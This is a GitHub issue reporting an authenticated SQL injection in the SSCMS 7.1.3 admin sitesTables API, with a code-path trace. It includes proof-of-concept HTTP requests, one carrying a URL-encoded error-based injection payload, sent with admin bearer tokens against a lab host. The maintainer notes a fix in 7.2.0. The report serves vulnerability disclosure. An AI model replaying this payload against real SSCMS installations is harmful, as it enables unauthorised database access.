Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

background admin sql inject #3492

Open
nolan124 opened this issue Oct 24, 2022 · 2 comments
Open

background admin sql inject #3492

nolan124 opened this issue Oct 24, 2022 · 2 comments

Comments

@nolan124
Copy link

Vulnerability conditions
SSCMS v7.1.3 +mysql+administrator privileges
Vulnerability details

  1. Discover the entry through code auditing
    SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs exists tablename SQL statement call

image

2. Called the GetCount method of SSCMS.Core/Services/DatabaseManager.cs

image

3. After entering the Quote method of SSCMS.Core/Services/DatabaseManager.Parser.cs

image

4、Call Database.cs(GetQuotedIdentifier)->DbUtils.cs(GetQuotedIdentifier)->MySqlImpl.cs(GetQuotedIdentifier) ​​in turn Finally, the returned result has not yet been filtered and other operations on the sql statement

image

` GET /api/admin/settings/sitesTables/1* HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Referer: http://192.168.3.129/utils/search.html?word=1111 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Connection: close ` poc in sqlmap

image

poc in burp
GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/plain, */* Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Referer: http://192.168.3.129/ss-admin/?siteId=57 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
image

@starlying
Copy link
Contributor

Fixed in 7.2.0, thanks

@nolan124
Copy link
Author

find by Chaitin Security Research Lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants